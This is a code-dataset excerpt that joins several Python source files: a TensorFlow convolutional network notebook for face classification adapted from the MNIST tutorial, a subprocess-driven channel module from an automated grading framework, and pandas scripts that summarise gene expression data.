reshape=True,\n# seed=None):\n# \"\"\"Construct a DataSet.\n# one_hot arg is used only if fake_data is true. `dtype` can be either\n# `uint8` to leave the input as `[0, 255]`, or `float32` to rescale into\n# `[0, 1]`. Seed arg provides for convenient deterministic testing.\"\"\"\n# seed1, seed2 = random_seed.get_seed(seed)\n# # If op level seed is not set, use whatever graph level seed is returned\n# np.random.seed(seed1 if seed is None else seed2)\n# dtype = dtypes.as_dtype(dtype).base_dtype\n# if dtype not in (dtypes.uint8, dtypes.float32):\n# raise TypeError('Invalid image dtype %r, expected uint8 or float32' %\n# dtype)\n# if fake_data:\n# self._num_examples = 10000\n# self.one_hot = one_hot\n# else:\n# assert images.shape[0] == labels.shape[0], (\n# 'images.shape: %s labels.shape: %s' % (images.shape, labels.shape))\n# self._num_examples = images.shape[0]\n\n# # Convert shape from [num examples, rows, columns, depth]\n# # to [num examples, rows*columns] (assuming depth == 1)\n# if reshape:\n# assert images.shape[3] == 1\n# images = images.reshape(images.shape[0],\n# images.shape[1] * images.shape[2])\n# if dtype == dtypes.float32:\n# # Convert from [0, 255] -> [0.0, 1.0].\n# #images = images.astype(np.float32)\n# images = np.multiply(images, 1.0 / 255.0)\n# self._images = images\n# self._labels = labels\n# self._epochs_completed = 0\n# self._index_in_epoch = 0\n\n# @property\n# def images(self):\n# return self._images\n\n# @property\n# def labels(self):\n# return self._labels\n\n# @property\n# def num_examples(self):\n# return self._num_examples\n\n# @property\n# def epochs_completed(self):\n# return self._epochs_completed\n\n# def next_batch(self, batch_size, fake_data=False, shuffle=True):\n# \"\"\"Return the next `batch_size` examples from this data set.\"\"\"\n# if fake_data:\n# fake_image = [1] * 6020\n# if self.one_hot:\n# fake_label = [1] + [0] * 9\n# else:\n# fake_label = 0\n# return [fake_image for _ in xrange(batch_size)], [\n# fake_label for _ in xrange(batch_size)]\n# start = self._index_in_epoch\n# # Shuffle for the first epoch\n# if self._epochs_completed == 0 and start == 0 and shuffle:\n# perm0 = np.arange(self._num_examples)\n# np.random.shuffle(perm0)\n# self._images = self.images[perm0]\n# self._labels = self.labels[perm0]\n# # Go to the next epoch\n# if start + batch_size > self._num_examples:\n# # Finished epoch\n# self._epochs_completed += 1\n# # Get the rest examples in this epoch\n# rest_num_examples = self._num_examples - start\n# images_rest_part = self._images[start:self._num_examples]\n# labels_rest_part = self._labels[start:self._num_examples]\n# # Shuffle the data\n# if shuffle:\n# perm = np.arange(self._num_examples)\n# np.random.shuffle(perm)\n# self._images = self.images[perm]\n# self._labels = self.labels[perm]\n# # Start next epoch\n# start = 0\n# self._index_in_epoch = batch_size - rest_num_examples\n# end = self._index_in_epoch\n# images_new_part = self._images[start:end]\n# labels_new_part = self._labels[start:end]\n# return np.concatenate((images_rest_part, images_new_part), axis=0) , np.concatenate((labels_rest_part, labels_new_part), axis=0)\n# else:\n# self._index_in_epoch += batch_size\n# end = self._index_in_epoch\n# return self._images[start:end], self._labels[start:end]\n\n\n# def read_data_sets(fake_data=False,\n# one_hot=False,\n# dtype=dtypes.float32,\n# reshape=True,\n# validation_size=5000,\n# seed=None):\n# if fake_data:\n\n# def fake():\n# return DataSet(\n# [], [], fake_data=True, one_hot=one_hot, dtype=dtype, seed=seed)\n\n# train = fake()\n# validation = fake()\n# test = fake()\n# return base.Datasets(train=train, validation=validation, test=test)\n \n# TRAIN = '/data/face_dataset/train/'\n# TEST = '/data/face_dataset/test/'\n# def read_images(direc, test=False):\n \n# pids = os.listdir(direc)\n# images = [] \n# labels = []\n# for pid in pids:\n# if test: \n# labels.append(pid) #TODO PID is a filename here \n# images.append(imread(direc + pid, dtype=np.uint8))\n# else: \n# for image_file in os.listdir(direc + pid):\n# #imagefiles.append(image_file)\n# labels.append(pid)\n# images.append(imread(direc + pid + '/' + image_file))\n \n# #print(images)\n# return np.array(images), np.array(labels)\n \n\n# train_images, train_labels = read_images(TRAIN)\n# test_images, test_labels = read_images(TEST, test=True)\n \n \n \n# if not 0 <= validation_size <= len(train_images):\n# raise ValueError(\n# 'Validation size should be between 0 and {}. Received: {}.'\n# .format(len(train_images), validation_size))\n\n# validation_images = train_images[:validation_size]\n# validation_labels = train_labels[:validation_size]\n# train_images = train_images[validation_size:]\n# train_labels = train_labels[validation_size:]\n\n\n# options = dict(dtype=dtypes.uint8, reshape=False, seed=seed)\n\n# train = DataSet(train_images, train_labels, **options)\n# validation = DataSet(validation_images, validation_labels, **options)\n# test = DataSet(test_images, test_labels, **options)\n\n# return base.Datasets(train=train, validation=validation, test=test)\n\n\n# In[3]:\n\n# data = read_data_sets()\n\n\n# In[4]:\n\n# mnist = data\n\n\n# In[5]:\n\n# data.train.images\n\n\n# In[6]:\n\nTRAIN = '/data/face_dataset/train/'\nTEST = '/data/face_dataset/test/'\ndef read_images(direc, test=False):\n\n pids = os.listdir(direc)\n images = [] \n labels = []\n for pid in pids:\n if test: \n labels.append(pid) #TODO PID is a filename here \n images.append(direc + pid)\n else: \n for image_file in os.listdir(direc + pid):\n #imagefiles.append(image_file)\n labels.append(int(pid))\n images.append(direc + pid + '/' + image_file)\n\n #print(images)\n return np.array(images), np.array(labels)\n\n\ntrain_images, train_labels = read_images(TRAIN)\ntest_images, test_labels = read_images(TEST, test=True)\n\n\n# In[7]:\n\n#Reads an image from a file, decodes it into a dense tensor, and resizes it\n# to a fixed shape.\nlabel_order = train_labels.copy()\nlabel_order = set(label_order)\nlabel_order = sorted(list(label_order))\n\ndef _parse_function(filename, label):\n image_string = tf.read_file(filename)\n image_decoded = tf.image.decode_image(image_string)\n image_decodes = tf.divide(tf.to_float(image_decoded), tf.constant(255.0))\n #print(image_decoded)\n #image_resized = tf.image.resize_images(image_decoded, [64, 64])\n# y_arr = np.zeros([398])\n# ind = label_order.index(label)\n# y_arr[ind] = 1\n# print(y_arr)\n \n return tf.reshape(image_decoded, [-1, 12288]), label\n\n# A vector of filenames.\n#filenames = tf.constant(imagefiles)\n\n# `labels[i]` is the label for the image in `filenames[i].\n#labels = tf.constant(labels)\n\ndataset_train = tf.data.Dataset.from_tensor_slices((tf.constant(train_images), tf.constant(train_labels)))\ndataset_train = dataset_train.map(_parse_function)\n\ndataset_test = tf.data.Dataset.from_tensor_slices((tf.constant(test_images), tf.constant(test_labels)))\ndataset_test = dataset_test.map(_parse_function) \n\n\n# In[8]:\n\n#mnist = dataset_train\n\n\n\n# # Build a Multilayer Convolutional Network\n# \n# Getting 91% accuracy on MNIST is bad. It's almost embarrassingly bad. In this section, we'll fix that, jumping from a very simple model to something moderately sophisticated: a small convolutional neural network. This will get us to around 99.2% accuracy -- not state of the art, but respectable.\n\n# In[9]:\n\nx = tf.placeholder(tf.float32, [None, 12288])\nW = tf.Variable(tf.zeros([12288, 398]))\nb = tf.Variable(tf.zeros([398]))\ny_ = tf.placeholder(tf.float32, [None, 398])\n\n\n# ## Weight & Biases Initialization\n# \n# To create this model, we're going to need to create a lot of weights and biases. One should generally initialize weights with a small amount of noise for symmetry breaking, and to prevent 0 gradients. Since we're using ReLU neurons, it is also good practice to initialize them with a slightly positive initial bias to avoid \"dead neurons.\" Instead of doing this repeatedly while we build the model, let's create two handy functions to do it for us.\n\n# In[10]:\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\n# ## Convolution & Pooling\n# \n# TensorFlow also gives us a lot of flexibility in convolution and pooling operations. How do we handle the boundaries? What is our stride size? In this example, we're always going to choose the vanilla version. Our convolutions uses a stride of one and are zero padded so that the output is the same size as the input.\n# \n# ![](http://deeplearning.stanford.edu/wiki/images/6/6c/Convolution_schematic.gif)\n# \n# http://deeplearning.stanford.edu/wiki/index.php/Feature_extraction_using_convolution\n# \n# Our pooling is plain old max pooling over 2x2 blocks. To keep our code cleaner, let's also abstract those operations into functions.\n# \n# ![](http://www.wildml.com/wp-content/uploads/2015/11/Screen-Shot-2015-11-05-at-2.18.38-PM.png)\n# \n# ![](http://colah.github.io/posts/2014-07-Conv-Nets-Modular/img/Conv-9-Conv2Max2Conv2.png)\n# \n# http://colah.github.io/posts/2014-07-Conv-Nets-Modular/\n\n# In[11]:\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\n# ## First Convolutional Layer\n# \n# We can now implement our first layer. It will consist of convolution, followed by max pooling. The convolutional will compute 32 features for each 5x5 patch. Its weight tensor will have a shape of [5, 5, 1, 32]. The first two dimensions are the patch size, the next is the number of input channels, and the last is the number of output channels. We will also have a bias vector with a component for each output channel.\n\n# In[12]:\n\nW_conv1 = weight_variable([5, 5, 3, 32])\nb_conv1 = bias_variable([32])\n\n\n# To apply the layer, we first reshape x to a 4d tensor, with the second and third dimensions corresponding to image width and height, and the final dimension corresponding to the number of color channels.\n\n# In[13]:\n\nx_image = tf.reshape(x, [-1,64,64,3])\n\n\n# We then convolve x_image with the weight tensor, add the bias, apply the ReLU function, and finally max pool.\n\n# In[14]:\n\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\nh_pool1 = max_pool_2x2(h_conv1)\n\n\n# ## Second Convolutional Layer\n# \n# In order to build a deep network, we stack several layers of this type. The second layer will have 64 features for each 5x5 patch.\n\n# In[15]:\n\nW_conv2 = weight_variable([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\n\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\nh_pool2 = max_pool_2x2(h_conv2)\n\n\n# ## Densely Connected Layer\n# \n# Now that the image size has been reduced to 7x7, we add a fully-connected layer with 1024 neurons to allow processing on the entire image. We reshape the tensor from the pooling layer into a batch of vectors, multiply by a weight matrix, add a bias, and apply a ReLU.\n\n# In[16]:\n\nW_fc1 = weight_variable([16 * 16 * 64, 1024])\nb_fc1 = bias_variable([1024])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 16*16*64])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n\n# ### Dropout\n# \n# To reduce overfitting, we will apply dropout before the readout layer. We create a placeholder for the probability that a neuron's output is kept during dropout. This allows us to turn dropout on during training, and turn it off during testing. TensorFlow's tf.nn.dropout op automatically handles scaling neuron outputs in addition to masking them, so dropout just works without any additional scaling.\n\n# In[17]:\n\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) #don't start with this, its hard \n\n\n# ## Readout Layer\n# \n# Finally, we add a softmax layer, just like for the one layer softmax regression.\n\n# In[18]:\n\nW_fc2 = weight_variable([1024, 398])\nb_fc2 = bias_variable([398])\n\ny_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n\n# ## Train and Evaluate the Model\n# \n# How well does this model do? To train and evaluate it we will use code that is nearly identical to that for the simple one layer SoftMax network above. The differences are that: we will replace the steepest gradient descent optimizer with the more sophisticated ADAM optimizer; we will include the additional parameter keep_prob in feed_dict to control the dropout rate; and we will add logging to every 100th iteration in the training process.\n# \n# \n\n# In[ ]:\n\n# initialize variables and session\n# init = tf.global_variables_initializer()\n# sess = tf.Session()\n# sess.run(init)\n\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv), reduction_indices=[1]))\n\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n# sess.run(tf.initialize_all_variables())\n \nBATCH_SIZE = 100 \n\nbatch = dataset_train.batch(BATCH_SIZE) #TODO \nitera = batch.make_one_shot_iterator()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n # Run mini-batch training on 100 elements 20000 times.\n for i in range(20000):\n t = sess.run(itera.get_next())\n #print(t[0][0], t[1])\n\n #encoding \n y_arr = np.zeros([BATCH_SIZE, 398])\n for j in range(BATCH_SIZE):\n ind = label_order.index(t[1][j])\n y_arr[j][ind] = 1\n #print(j)\n #y_arr = np.reshape(y_arr, [-1, 398])\n #print(t[0].reshape(BATCH_SIZE, 12288)/255.0)\n if i%10 == 0:\n #print(batch[0])\n train_accuracy = accuracy.eval(feed_dict={\n x:t[0].reshape(BATCH_SIZE, 12288)/255.0, y_: y_arr, keep_prob: 1.0})\n #print(i)\n# train_accuracy = sess.run(accuracy, feed_dict={\n# x:t[0].reshape(BATCH_SIZE, 12288), y_: y_arr, keep_prob: 1.0})\n print(\"step %d, training accuracy %g\" % (i, train_accuracy))\n #print(i)\n # train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n #sess.run(itera.get_next())\n# sess.run(train_step, feed_dict={x: t[0].reshape(BATCH_SIZE, 12288) , y_: y_arr, keep_prob: 0.5})\n train_step.run(feed_dict={x: t[0].reshape(BATCH_SIZE, 12288)/255.0 , y_: y_arr, keep_prob: 0.5})\n #print(i, \"Completed epoch\")\n # todo run the test data \n # plug it in \n\n\n\n #print(\"test accuracy %g\" % sess.run(accuracy, feed_dict={\n # x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n\n# In[ ]:\n\n\n\n\n# The final test set accuracy after running this code should be approximately 99.2%.\n# \n# We have learned how to quickly and easily build, train, and evaluate a fairly sophisticated deep learning model using TensorFlow.\n# \n# 1: For this small convolutional network, performance is actually nearly identical with and without dropout. Dropout is often very effective at reducing overfitting, but it is most useful when training very large neural networks.\n\n# # Visualizing with TensorBoard\n# \n# Visualize with [TensorBoard](https://www.tensorflow.org/tensorboard/index.html).\n\n# ![](https://www.tensorflow.org/versions/master/images/mnist_tensorboard.png)\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"CNN3.py","file_name":"CNN3.py","file_ext":"py","file_size_in_byte":17762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"629411285","text":"from moduls.schemaSpecificAttr import *\nfrom moduls.exceptions import *\nfrom moduls.resultContent import resultContent as rs\n\nimport collections\nimport subprocess\nimport select\nimport re\nimport time\n\n'''\nChannel Modul\nThis modul can initialize channels and run it base on resultcontent.getScripts()\nopenFileWithCheckFn : function reference to dataStore's instance's openFileWithCheck function\n'''\nclass channel:\n def __init__(self,resultContent, logger, InputChStreamValidFn, chStringValidFn, openFileWithCheckFn):\n '''\n Initialize channels width fill inputstreams\n '''\n self.channels = collections.defaultdict(list)\n self.resultContent = resultContent\n self.logger = logger\n self.openList = []\n # input channel schema validation function reference\n self.chStringValidFn = chStringValidFn\n\n for script in self.resultContent.getScripts():\n if CH_INPUT_TYPE in script:\n if script[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[0]:\n # inputstream from exercise.X.xml object's tasks\n script['taskInput'] = self.__xmlTaskInputToList(self.resultContent.getAll(tag=CH_INPUTSTREAM,attrName=SOLUTION_CH_NAME,attrValue=script[CHANNEL_NAME_ATTR]))\n elif script[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[1]:\n if CH_EXT_PATH not in script:\n raise AKEPException(ERROR['SCRIPT']['MISSING_PATH']+script[CHANNEL_NAME_ATTR])\n # load external file data ..\n data = openFileWithCheckFn(script[CH_EXT_PATH], InputChStreamValidFn)\n if data is None:\n raise AKEPException(ERROR['GENERAL']['PERMISSON'] +'read file or '+ ERROR['FILE']['INVALID']+script[CH_EXT_PATH])\n # .. with binding keys\n data = self.resultContent.keyBinding(data)\n # .. to inputstream\n script['taskInput'] = self.__xmlTaskInputToList(self.resultContent.getAll(element=data, tag=TASKTAG),False)\n elif script[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[2]:\n if FROM_CAHNNEL not in script:\n # if inputType is fromChannel and script tag does not has sourceChannel attr\n raise AKEPException(ERROR['SCRIPT']['NOT_VALID_VALUE'].format(FROM_CAHNNEL,script[CHANNEL_NAME_ATTR]))\n else:\n # no exist inputType\n raise AKEPException(ERROR['SCRIPT']['NOT_VALID_VALUE'].format('inputType',script[CHANNEL_NAME_ATTR]))\n \n # channel inner inputstream used to write initial content before taskInput, after script error this content will use as input again\n # and taskInput start after the error phase\n script[CH_INPUTSTREAM] = []\n for inputNode in self.resultContent.getAll(tag=CH_INPUTSTREAM,element=script['node'],direct=True):\n script[CH_INPUTSTREAM].append(inputNode.text)\n if len(script[CH_INPUTSTREAM]) == 0:\n del script[CH_INPUTSTREAM]\n self.channels[script[ENTRY_ATTR]].append(script)\n\n def __xmlTaskInputToList(self,elements,inlineType=True):\n '''\n If you use inputstream in tasks and there is at least one channel which has inner inputType,\n this function will convert these inputstreams to channel inputstream\n '''\n inputs = []\n for inputNode in elements:\n taskID = rs.getAttrValue(rs.getParent(inputNode) if inlineType else inputNode,TASK_ELEMENT_ID)\n children = rs.getChildren(inputNode)\n if len(children) == 0:\n # only text\n inputs.append({'taskID':taskID,'input':rs.getText(inputNode)})\n else:\n # contain elements\n inputstream = ''\n for child in children:\n inputstream += rs.toStringFromElement(child).decode('utf-8')\n inputs.append({'taskID':taskID,'input':inputstream})\n return inputs\n\n def run(self):\n '''\n Run all channels in definied order\n '''\n order = CH_ENTRY_ORDER\n for entry in order:\n for ch in self.channels[entry]:\n # create taskinput and inputstream\n if 'taskInput' in ch:\n taskInput = SEPARATOR_COMMUNICATE_TASK_END.join(inputItem['input'] for inputItem in ch['taskInput'])\n inputstream = '\\n'.join(ch[CH_INPUTSTREAM]) if CH_INPUTSTREAM in ch else '' \n \n if CH_INPUT_TYPE in ch and ch[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[2]:\n refChOut = self.__getChannel(ch[FROM_CAHNNEL])\n if refChOut == None or 'out' not in refChOut or refChOut['out'] == '':\n raise AKEPException(ERROR['NOT_FIND']['CH_OR_CHOUT'].format(ch[FROM_CAHNNEL],ch[CHANNEL_NAME_ATTR]))\n output = str(refChOut['out'])\n if CH_INPUTTO in ch:\n ch['arguments'] = ch['arguments'].replace(ch[CH_INPUTTO],output)\n if inputstream != '':\n inputstream = inputstream.replace(ch[CH_INPUTTO],output)\n else:\n inputstream = (inputstream+'\\n'+output) if inputstream != '' else output\n \n concatInnerInputToTaskInp = '' if inputstream == '' else inputstream + SEPARATOR_COMMUNICATE_TASK_END\n \n arguments = (ch[CH_PATH]+' '+ch['arguments']).split()\n ch['out'] = None\n ch['error'] = None\n again = True\n while again:\n again = False\n ch['errorType'] = ''\n ch['start'] = str(time.time())\n try:\n self.logger.info('Channel {} start'.format(ch[CHANNEL_NAME_ATTR]))\n self.logger.debug('Channel arguments: {} inputstream: {}'.format(ch['arguments'],inputstream if 'taskInput' not in ch else (concatInnerInputToTaskInp + taskInput)))\n if entry == CH_ENTRY_ORDER[1]:\n proc = subprocess.Popen(arguments, stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)\n if inputstream != '': \n proc.stdin.write(inputstream)\n proc.stdin.close()\n poll_obj = select.poll()\n result = ''\n # con type can trigger the next item in chain if channel has CH_CHAIN_CONT_COND\n if CH_CHAIN_CONT_COND in ch:\n if ch[CH_CHAIN_CONT_COND] == CH_CHAIN_CONT_COND_TYPE[1]: \n poll_obj.register(proc.stderr, select.POLLIN)\n if poll_obj.poll(CH_CON_TYPE_ANSWER_TIMEOUT):\n result = proc.stderr.readline()\n else:\n raise subprocess.TimeoutExpired(None,None)\n elif ch[CH_CHAIN_CONT_COND] == CH_CHAIN_CONT_COND_TYPE[0]:\n poll_obj.register(proc.stdout, select.POLLIN)\n if poll_obj.poll(CH_CON_TYPE_ANSWER_TIMEOUT):\n result = proc.stdout.readline()\n else:\n raise subprocess.TimeoutExpired(None,None)\n self.openList.append({'proc':proc,'chName':ch[CHANNEL_NAME_ATTR], 'entry':entry})\n if proc.poll() is not None or 'error' in result.lower() or 'traceback' in result.lower():\n raise subprocess.SubprocessError('Contionous channel is dead')\n else:\n # run subprocess\n proc = subprocess.Popen(arguments,stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.PIPE, universal_newlines=True)\n self.openList.append({'proc':proc,'chName':ch[CHANNEL_NAME_ATTR],'entry':entry})\n out, error = proc.communicate(input=(inputstream if 'taskInput' not in ch else (concatInnerInputToTaskInp + taskInput)),timeout=60)\n self.logger.info('Channel {} stop'.format(ch[CHANNEL_NAME_ATTR]))\n if proc.poll() != 0:\n raise subprocess.SubprocessError(error)\n if CH_OUT_TASK_TYPE in ch:\n ch['out'] = self.chStringValidFn(re.sub('set feedback (on|off)','',re.sub('--.*\\n','',out[out.find(''):out.find('')+8].replace('prompt','')),flags=re.DOTALL))\n else: \n ch['out'],lastRightIndex = self.__createChannelOutputToTaskXML(ch['taskInput'],out,ch['out'],concatInnerInputToTaskInp) if 'taskInput' in ch else (out,None)\n ch['error'],nothing = self.__createChannelOutputToTaskXML(ch['taskInput'],error,ch['error'],concatInnerInputToTaskInp) if 'taskErrorHandle' in ch else (error,None)\n self.logger.debug('channel: {} out: {}'.format(ch[CHANNEL_NAME_ATTR], rs.toStringFromElement(ch['out']).decode('utf-8') if rs.isElementType(ch['out']) else ch['out'])) \n except FileNotFoundError:\n ch['stop'] = str(time.time())\n ch['errorType'] = 'Script not found'\n self.terminateChannelScripts()\n raise AKEPException(ERROR['FILE']['NOT_FIND']+ch[CHANNEL_NAME_ATTR])\n except subprocess.TimeoutExpired:\n ch['errorType'] = 'Channel time out'\n ch['stop'] = str(time.time())\n proc.kill()\n raise AKEPException(ERROR['SCRIPT']['TIME_EXPIRED']+ ch[CHANNEL_NAME_ATTR])\n except PermissionError:\n ch['stop'] = str(time.time())\n raise AKEPException(ERROR['GENERAL']['PERMISSON'] + 'script: '+ch[CHANNEL_NAME_ATTR])\n except (subprocess.SubprocessError, subprocess.CalledProcessError) as err:\n if 'taskInput' in ch:\n ch['errorType'] = '[ReRUN] Call- or subprocess error' \n self.logger.exception('Error in script: '+ch[CHANNEL_NAME_ATTR])\n # create new run envirement with the content after error\n ch['out'], lastRightIndex = self.__createChannelOutputToTaskXML(ch['taskInput'],out,ch['out'],concatInnerInputToTaskInp)\n ch['out'].append(rs.createElement(TASKTAG,{TO_ELEMENT_ERROR_ATTR:str(err),TASK_ELEMENT_ID:ch['taskInput'][lastRightIndex+1]['taskID']}))\n if 'taskErrorHandle' in ch:\n ch['error'] = self.__createChannelOutputToTaskXML(ch['taskInput'],str(err),ch['error'],concatInnerInputToTaskInp)\n errorTag,nothing = rs.createElement(TASKTAG,{TASK_ELEMENT_ID:ch['taskInput'][lastRightIndex+1]['taskID']})\n ch['error'].append(errorTag)\n if lastRightIndex+1 < len(ch['taskInput'])-1 and NO_CONTINUE_AFTER_ERROR not in ch and 'CRITICAL' not in str(err):\n taskInput = SEPARATOR_COMMUNICATE_TASK_END.join([ch['taskInput'][index]['input'] for index in range(lastRightIndex+2,len(ch['taskInput']))])\n again = True\n else:\n ch['errorType'] = 'Call- or subprocess error'\n ch['stop'] = str(time.time())\n raise AKEPException('Error in script: '+ ch[CHANNEL_NAME_ATTR])\n ch['stop'] = str(time.time())\n self.terminateChannelScripts()\n\n def __getChannel(self,name):\n for entry in self.channels:\n for ch in self.channels[entry]:\n if ch[CHANNEL_NAME_ATTR] == name:\n return ch\n raise AKEPException('Not find channel {}'.format(name))\n\n def getChannelTaskOutput(self,channelName,taskID,shouldError):\n '''\n Public function to get channel task content\n return: text content, shouldError if it was an error else not shouldError\n '''\n ch = self.__getChannel(channelName)\n if rs.isElementType(ch['out']):\n # first try check error output from ch['error'] in case of preprocessor handle the errors\n if 'taskErrorHandle' in ch and shouldError:\n errorToTask = self.resultContent.get(element=ch['error'], tag=TASKTAG, attrName='n', attrValue=taskID)\n if errorToTask is not None:\n return (rs.getText(errorToTask),shouldError)\n\n task = self.resultContent.get(element=ch['out'], tag=TASKTAG, attrName='n', attrValue=taskID) \n if task is None:\n return (None, shouldError)\n # .. try check the errors which are catched by AKEP\n if rs.getAttrValue(task,TO_ELEMENT_ERROR_ATTR) is not None:\n return rs.getAttrValue(task,TO_ELEMENT_ERROR_ATTR),shouldError\n # final there was not error\n return (rs.getText(task),not shouldError)\n return (ch['out'],True)\n \n def __createChannelOutputToTaskXML(self,taskInputStream,xmlTextList,prevXML,concatInnerInputToTaskInp):\n '''\n Create channel (xml format) output from separated plain text\n Handle: error state with result second parameter\n return: xml format tasks output, valid last task index from taskInputStream\n '''\n tasks = xmlTextList.strip().strip(SEPARATOR_COMMUNICATE_TASK_END).split(SEPARATOR_COMMUNICATE_TASK_END)\n\n if concatInnerInputToTaskInp != '' and len(tasks) > 0:\n # delete the output which belong to the initial inputstream (if it exist)\n del tasks[0]\n if len(tasks) == 0 or tasks[0] == '':\n # return only prevXML if no new content after error\n return (prevXML,len(prevXML)-1) if prevXML is not None else (rs.createElement('tasks'),-1)\n\n prevInd = len(prevXML) if prevXML is not None else 0\n\n try: \n xmlText = ''+''.join(['' for index in range(0,len(tasks))])+''\n except IndexError as err:\n self.logger.debug('PrevInd:{}\\nrequiredTaskLen:{}\\nTaskLen{}\\nTasks{}'.format(prevInd,len(taskInputStream),len(tasks),'\\n---------------'.join(tasks)))\n raise AKEPException(str(err))\n\n # create result xml if it valid channel output\n tasksXML = self.chStringValidFn(xmlText)\n\n # return result xml, last valid index\n if prevXML is None:\n return (tasksXML, len(tasks)-1)\n for task in tasksXML:\n rs.appendTo(task,prevXML)\n return (prevXML,prevInd+len(tasks)-1)\n\n def terminateChannelScripts(self, killIt=False):\n '''\n Public function to terminate/kill openned subprocessors\n '''\n if hasattr(self,'openList'):\n for item in self.openList:\n if not killIt:\n self.logger.debug('Channel: {} returnCode {}'.format(item['chName'],item['proc'].poll()))\n if item['proc'].poll() is None:\n if killIt:\n item['proc'].kill()\n self.logger.info('Channel {} killed'.format(item['chName'])) \n else:\n item['proc'].terminate() \n self.logger.info('Channel {} terminated'.format(item['chName']))","sub_path":"src/framework/moduls/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":16381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"539508024","text":"import pandas as pd\nfrom pandas import DataFrame\nimport fire\nfrom pathlib import Path\nimport numpy as np\n\n\ndef exp_summary_group_num(exp_table, group_inf, exp_cutoff,\n out_dir, prefix):\n exp_df = pd.read_table(exp_table)\n m_exp_df = exp_df.melt(id_vars='Gene_id',\n value_name='circ_count',\n var_name='sample_id')\n m_exp_df = m_exp_df[m_exp_df.circ_count > exp_cutoff]\n group_df = pd.read_table(group_inf,\n header=None,\n names=['group_id', 'sample_id'])\n m_exp_df = m_exp_df.merge(group_df)\n g_exp_df = m_exp_df.loc[:, ['Gene_id', 'group_id']].drop_duplicates()\n gene_summary1 = g_exp_df.Gene_id.value_counts()\n tmp_gene_summary2 = g_exp_df.groupby(['Gene_id'])['group_id'].unique()\n gene_summary2 = tmp_gene_summary2.map(','.join)\n gene_summary1.name = 'group_count'\n gene_summary2.name = 'group_name'\n gene_summary = pd.concat([gene_summary1, gene_summary2],\n axis=1, sort=True)\n group_summary1 = g_exp_df.group_id.value_counts()\n solo_exp_genes = gene_summary1[gene_summary1 == 1].index\n solo_exp_df = m_exp_df[m_exp_df.Gene_id.isin(solo_exp_genes)]\n group_summary2 = solo_exp_df.group_id.value_counts()\n group_summary1.name = 'exp'\n group_summary2.name = 'exclusive_exp'\n group_summary = pd.concat([group_summary1, group_summary2],\n axis=1, sort=True)\n group_summary.loc[:, 'exp_portion'] = group_summary.exp / \\\n len(gene_summary)\n group_summary.loc[\n :, 'exclusive_exp_portion'] = group_summary.exclusive_exp / \\\n len(gene_summary)\n out_dir = Path(out_dir)\n if not out_dir.exists():\n out_dir.mkdir()\n gene_summary_file = out_dir / f'{prefix}.gene.exp.summary.txt'\n gene_summary.index.name = 'gene_id'\n gene_summary.to_csv(gene_summary_file, sep='\\t')\n group_summary_file = out_dir / f'{prefix}.group.exp.summary.txt'\n group_summary.index.name = 'group_id'\n group_summary.loc['Total'] = [len(gene_summary),\n group_summary.exclusive_exp.sum(),\n 1,\n group_summary.exclusive_exp_portion.sum()]\n group_summary.to_csv(group_summary_file, sep='\\t',\n na_rep=0)\n group_num = len(group_df.group_id.unique())\n gene_num_p = gene_summary1 / group_num\n gene_num_dis = pd.cut(\n gene_num_p,\n np.arange(0, 1.2, 0.2),\n labels=np.arange(\n 0, 1, 0.2)).value_counts().sort_index()\n gene_num_dis = DataFrame(gene_num_dis)\n gene_num_dis.index.name = 'group_portion'\n gene_num_dis.columns = ['gene_number']\n gene_num_dis = gene_num_dis.reset_index()\n gene_num_dis.loc[:, 'group_portion'] = gene_num_dis.group_portion.round(1)\n gene_num_dis.loc[:, 'gene_portion'] = gene_num_dis.gene_number / \\\n gene_num_dis.gene_number.sum()\n gene_num_dis_file = out_dir / f'{prefix}.gene_number.distribution.txt'\n gene_num_dis.to_csv(gene_num_dis_file, sep='\\t',\n index=False)\n\n\ndef top_gene_classify(top_gene, gene_ts_type, gene_biotype, outfile):\n top_gene_df = pd.read_table(top_gene)\n gene_type_df = pd.read_table(gene_biotype)\n gene_ts_df = pd.read_table(gene_ts_type,\n header=None,\n names=['Gene_id', 'ts_type'])\n top_gene_df = top_gene_df.merge(gene_ts_df)\n top_gene_df = top_gene_df.merge(gene_type_df,\n left_on='Gene_id',\n right_on='gene_id')\n top_gene_type_df = top_gene_df.groupby(\n ['Group', 'gene_biotype', 'ts_type']).size().unstack(fill_value=0)\n top_gene_count_df 